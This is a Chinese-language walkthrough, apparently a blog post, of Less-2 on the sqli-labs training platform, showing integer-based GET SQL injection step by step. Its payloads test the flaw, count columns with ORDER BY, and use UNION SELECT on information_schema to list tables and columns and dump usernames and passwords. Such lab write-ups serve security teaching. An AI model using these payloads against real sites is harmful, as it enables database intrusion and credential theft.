sql-labs SQL注入平台——第二关Less-2 GET - Error based - Intiger based (基于错误的GET整型注入)

Less-2 GET - Error based - Intiger based (基于错误的GET整型注入)
一、先确认漏洞是否存在
(1)查询

id=1

在这里插入图片描述

返回查询结果正常
(2)查询

id=1

在这里插入图片描述

返回查询结果报错,可能存在SQL注入
在这里插入图片描述

(3)查询

id=1 and 1=1

在这里插入图片描述

返回查询结果正常
(4)查询

id=1 and 1=2

在这里插入图片描述

没有返回id为1的用户信息,确认SQL注入漏洞存在
二、开始攻击
(1)判断列数(后面用union查询要用到)
查询,返回结果按照前三列数据排序

id=1 order by 3;--+

在这里插入图片描述

返回结果正常,说明至少存在三列数据
查询,返回结果按照前4列数据排序

id=1 order by 4;--+

在这里插入图片描述

返回结果错误:没有第4列数据,说明只存在三列数据
(2)拼接union查询
查询id为0的用户肯定是没有返回结果的,这样返回的就只有union联合查询的第二个查询 select 1,2,3;的结果

id=0 union select 1,2,3;--+

在这里插入图片描述

只返回了2、3说明,后端从数据库中执行SQL语句select 1,2,3;只在前端显示了第2、3个字段,所以我们能看到的就只有第2、3个字段,就要把注入点放在第2、3个位置上
(3)查询当前数据库的名称

id=0 union select 1,database(),3;--+

在这里插入图片描述

得到当前数据库名security
(4)猜测数据库表名

id=0 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'; --+

在这里插入图片描述

得到security数据库中的表emails,referers,uagents,users
(5)猜字段名
查询security数据库users表中的字段名

id=0 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema="security" and table_name="users" --+

在这里插入图片描述

得到字段名:id,username,password
(6)读取具体的值
读取账号和密码的值:

id=0 union select 1,group_concat(username),group_concat(password) from security.users --+

在这里插入图片描述

  • 3
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值